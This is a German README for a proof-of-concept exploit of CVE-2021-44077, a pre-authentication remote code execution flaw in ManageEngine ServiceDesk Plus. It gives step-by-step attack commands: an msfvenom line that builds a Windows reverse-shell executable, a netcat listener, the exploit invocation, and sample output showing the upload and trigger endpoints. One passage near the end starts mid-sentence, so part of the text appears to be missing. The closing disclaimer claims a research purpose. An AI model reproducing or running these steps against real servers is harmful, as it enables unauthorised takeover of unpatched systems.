
Proof-of-Concept-Exploit für PreAuth-RCE in ManageEngine ServiceDesk Plus (CVE-2021-44077). Lädt beliebige Windows-Executables hoch und führt sie auf verwundbaren Zielsystemen aus.
Proof of Concept Exploit für CVE-2021-44077: PreAuth RCE in ManageEngine ServiceDesk Plus < 11306
Basiert auf:
CISA Advisory:
Behebung (Update auf Build 11306 oder höher):
Getestet auf ManageEngine ServiceDesk Plus Build 11303. Alle AV deaktiviert.
Der Exploit lädt eine Windows ausführbare Datei auf das Ziel hoch und führt sie aus.
Um den Exploit durchzuführen, generieren Sie zunächst eine beliebige ausführbare Datei. Beispiel:
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.140 LPORT=4444 -f exe > msiexec.exe
Führen Sie pip install für die Requirements-Datei aus, oder stellen Sie sicher, dass das requests-Paket installiert ist.
Wenn Sie eine Reverse Shell empfangen möchten, starten Sie zuerst Ihren Listener, z. B.
nc -l 4444
Führen Sie dann das Exploit-Skript aus und übergeben Sie die Argumente url und exe, z. B.
python exploit.py http://<TARGET>:<PORT> <path_to_exe>
Beispielhafte Skriptausgabe:
% python exploit.py http://192.168.0.140:8080 msiexec.exe
[+] Target: http://192.168.0.140:8080/
[+] Executable: msiexec.exe
[+] Uploading msiexec.exe to http://192.168.0.140:8080/RestAPI/ImportTechnicians?step=1
[+] Got 401 error code on upload. This is expected.
[+] Uploaded msiexec.exe
[+] Attempting to invoke against url http://192.168.0.140:8080/./RestAPI/s247action. Waiting up to 20 seconds...
[+] Done, did it work?

bin-Verzeichnis der Installation hochzuladen, einschließlich vorhandener Dateien wie Batch-Skripte. Es könnte andere Möglichkeiten geben, die hochgeladene Datei aufzurufen.Diese Software wurde ausschließlich für Zwecke der akademischen Forschung und zur Entwicklung effektiver Abwehrtechniken erstellt und ist nicht dazu bestimmt, Systeme anzugreifen, sofern nicht ausdrücklich autorisiert. Die Projektverantwortlichen sind nicht verantwortlich oder haftbar für den Missbrauch der Software. Verwenden Sie sie verantwortungsvoll.